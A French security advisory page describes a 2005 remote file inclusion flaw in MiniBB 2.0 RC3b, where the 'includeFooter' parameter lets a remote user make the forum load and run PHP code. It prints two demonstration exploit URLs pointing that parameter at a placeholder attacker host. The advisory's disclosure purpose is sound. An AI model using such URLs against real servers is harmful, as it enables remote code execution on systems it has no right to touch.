Sécurité informatique

securite informatique
     SECURINFOS
     in English
     Bulletins sécurité
     Docs sécurité
     Logiciels sécurité
     Vieux Logiciels
     Forum sécurité
     Services
     Définitions
     Astuces Windows
     MetaSploit
     M$ OPcodes
     Passwords
     Dictionnaires
     Contact
     Liens

SecurInfos.info - Bulletins de sécurité informatique, Alertes et Protection

MiniBB : Exécution de Commandes Arbitraires
Envoyer ce bulletin de sécurité informatique par mail

18/08/2005 09H26

Impact : Exécution de commandes arbitraires via le réseau, Accès utilisateur via le réseau
Exploit Inclus : OUI
Version(s) : 2.0 RC3b

Description :
V4mu de Anomaly 1n The System a découvert une vulnérabilité dans MiniBB. Un utilisateur distant peut exécuter des commandes arbitraires sur le système cible.

Les scripts 'index.php' et 'bb_admin.php' ne valident pas correctement l'entrée utilisateur dans le paramètre 'includeFooter'. Un utilisateur distant peut soumettre une URL construite spécifiquement pour entrainer le système cible à inclure et exécuter du code PHP arbitraire depuis un lieu distant. Le code PHP, incluant des commandes système, sera exécuté avec les privilèges du service web cible.

Quelques URLs d'exploitation de démonstration sont fournies:

http://[CIBLE]/[path_to_minibb]/index.php?includeFooter=http://[attaquant]


http://[CIBLE]/[path_to_minibb]/bb_admin.php?includeFooter=ht tp://[attaquant]


Joao Paulo a rapporté cette vulnérabilité.

Impact :
Un utilisateur distant peut exécuter du code PHP arbitraire et des commandes systèmes sur le système cible avec les privilèges du service web cible.

Solutions :
Aucune solution disponible à l'heure de cette publication.

URL de l'éditeur : www.minibb.net/

Cause : Erreur de validation d'entrée, Erreur d'état
OS : Linux (Tous), UNIX (Tous), Windows (Tous)
Rapporté par : Joao Paulo (scu.java gmail.com)



Les noms, marques et enseignes cités sur ce site sont la propriété de leurs déposants respectifs.

Derniers bulletins de sécurité informatique

Bulletins de sécurité informatiques relatifs

20080429 miniBB whatus Vulnérabilité Cross Site Scripting
20080429 miniBB Cross Site Scripting et Injection SQL
20080117 Mini File Host language Inclusion de Fichier Local
20070409 man db BROWSER Vulnérabilité d'Elévation de Privilèges
20061220 Mini Web Shop catname Cross Site Scripting
20061027 miniBB pathToFiles Vulnérabilité d'Inclusion de Fichier
20061013 miniBB Keyword Replacer pathToFiles Vulnérabilité d'Inclusion de Fichier
20060529 Mini NUKE Vulnérabilités d'Injection SQL
20060508 2005 Comments Script Vulnérabilités Diverses
20060113 Mini NUKE Injection SQL and Unauthenticated Password Change
20050818 MiniBB Exécution de Commandes Arbitraires
20031230 miniBB Vulnérabilité Cross Site Scripting
20030730 man db Vulnérabilités de Dépassement de Tampon
20021015 Mini Server traversee de repertoire bug
 
Securite informatique

JA-PSI - Sécurité informatique - Tous droits réservés
formation sécurité informatiqe